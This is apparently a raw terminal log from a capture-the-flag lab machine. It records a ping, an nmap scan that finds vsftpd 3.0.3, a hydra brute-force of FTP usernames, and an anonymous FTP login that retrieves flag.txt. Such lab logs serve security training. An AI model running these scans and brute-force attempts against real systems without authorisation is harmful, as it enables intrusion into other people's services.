ip: 10.129.85.157
ping 10.129.85.157 
	PING 10.129.85.157 (10.129.85.157) 56(84) bytes of data.
	64 bytes from 10.129.85.157: icmp_seq=1 ttl=63 time=85.6 ms
	64 bytes from 10.129.85.157: icmp_seq=2 ttl=63 time=86.1 ms
	64 bytes from 10.129.85.157: icmp_seq=3 ttl=63 time=85.8 ms
	^C
	--- 10.129.85.157 ping statistics ---
	3 packets transmitted, 3 received, 0% packet loss, time 2003ms
	rtt min/avg/max/mdev = 85.627/85.870/86.135/0.207 ms
      
nmap -sV 10.129.85.157 -oN Adular/EscaneoServiciosNmap.txt 
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 10:57 -05
	Nmap scan report for 10.129.85.157
	Host is up (0.16s latency).
	Not shown: 999 closed tcp ports (reset)
	PORT   STATE SERVICE VERSION
	21/tcp open  ftp     vsftpd 3.0.3
	Service Info: OS: Unix

	Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 3.76 seconds

ftp 10.129.85.157
	Connected to 10.129.85.157.
	220 (vsFTPd 3.0.3)
	Name (10.129.85.157:shadowadmin):   
	
sudo hydra -L passwords.txt -p "" ftp://10.129.85.157

	[sudo] password for shadowadmin: 
	Sorry, try again.
	[sudo] password for shadowadmin: 
	Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

	Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-23 11:15:53
	[DATA] max 16 tasks per 1 server, overall 16 tasks, 3672 login tries (l:3672/p:1), ~230 tries per task
	[DATA] attacking ftp://10.129.85.157:21/
	[21][ftp] host: 10.129.85.157   login: anonymous
	^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
ftp 10.129.85.157
	Connected to 10.129.85.157.
	220 (vsFTPd 3.0.3)
	Name (10.129.85.157:shadowadmin): anonymous 
	331 Please specify the password.
	Password: 
	230 Login successful.
	Remote system type is UNIX.
	Using binary mode to transfer files.
	ftp> 

ftp> ls
	229 Entering Extended Passive Mode (|||33111|)
	150 Here comes the directory listing.
	-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
	226 Directory send OK.

ftp> get flag.txt
	local: flag.txt remote: flag.txt
	229 Entering Extended Passive Mode (|||43933|)
	150 Opening BINARY mode data connection for flag.txt (32 bytes).
	100% |**************************|    32        0.36 KiB/s    00:00 ETA
	226 Transfer complete.
	32 bytes received in 00:00 (0.10 KiB/s)

